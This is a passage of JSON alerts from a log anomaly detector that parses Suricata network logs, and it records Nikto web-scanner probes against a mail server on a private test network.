"/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46870,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46870, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":648776268834898,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 648776268834898, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.257763+0000\",\"flow_id\":648776268834898,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46870,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.prf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.prf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.26 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.259495 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46872 -> 192.168.10.154:80", "/parser/model/time": 1583349514.259495, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46872, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.259495 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46872 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.26 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.tml", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.259845+0000\",\"flow_id\":2191605830972159,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46872,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.tml\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.tml\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.259845, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2191605830972159,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46872,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.tml\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.tml\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46872,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.tml\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.tml\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.tml\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.tml\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.tml", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.tml", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46872,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46872, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2191605830972159,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2191605830972159, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.259845+0000\",\"flow_id\":2191605830972159,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46872,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.tml\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.tml\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.26 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.261300 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46874 -> 192.168.10.154:80", "/parser/model/time": 1583349514.2613, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46874, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.261300 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46874 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.26 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.render_css", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.261544+0000\",\"flow_id\":1200378918664871,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46874,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.render_css\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.render_css\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.261544, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1200378918664871,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46874,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.render_css\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.render_css\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46874,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.render_css\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.render_css\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.render_css\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.render_css\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.render_css", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.render_css", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46874,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46874, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1200378918664871,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1200378918664871, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.261544+0000\",\"flow_id\":1200378918664871,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46874,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.render_css\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.render_css\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.26 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.263653 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46876 -> 192.168.10.154:80", "/parser/model/time": 1583349514.263653, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46876, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.263653 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46876 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.26 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.*", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.263864+0000\",\"flow_id\":486095792505167,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46876,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.*\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.*\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.263864, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":486095792505167,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46876,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.*\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.*\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46876,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.*\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.*\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.*\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.*\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.*", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": 